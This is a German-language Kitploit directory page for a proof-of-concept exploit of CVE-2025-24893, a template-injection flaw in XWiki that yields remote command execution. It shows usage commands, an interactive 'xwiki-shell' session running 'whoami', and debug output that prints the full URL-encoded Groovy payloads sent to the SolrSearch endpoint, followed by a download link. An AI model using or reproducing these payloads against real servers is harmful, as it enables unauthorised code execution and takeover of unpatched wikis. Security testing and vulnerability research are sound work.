Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893 — Proof-of-Concept-Exploit für CVE-2025-24893, eine SSTI-Schwachstelle in XWiki, die eine interaktive Shell für die Remote-Befehlsausführung bereitstellt. | Kitploit
Tools/GitHubGitHub/y2f05p2w/cve-2025-24893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHuby2f05p2w/cve-2025-24893

CVE-2025-24893

Proof-of-Concept-Exploit für CVE-2025-24893, eine SSTI-Schwachstelle in XWiki, die eine interaktive Shell für die Remote-Befehlsausführung bereitstellt.

Repository anzeigen
12vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Infos

Dieser PoC testet zuerst auf die SSTI und prüft, ob sie funktioniert. Danach geht er in eine Schleife und ermöglicht es dir, Befehle remote auszuführen.

Die Befehle exec und shell tun derzeit dasselbe.

Verwendung

Verbinden

root@kitploit:~
python3 poc.py <target>

Beispiel

Mit debug auf False gesetzt (Standard)

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

Mit debug auf True gesetzt

Das debug-Flag am Anfang des Skripts zeigt dir die generierten URLs an. Es wird eine debug.log-Datei erstellt, die die rohe Antwort der Anfrage enthält.

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
Tool herunterladen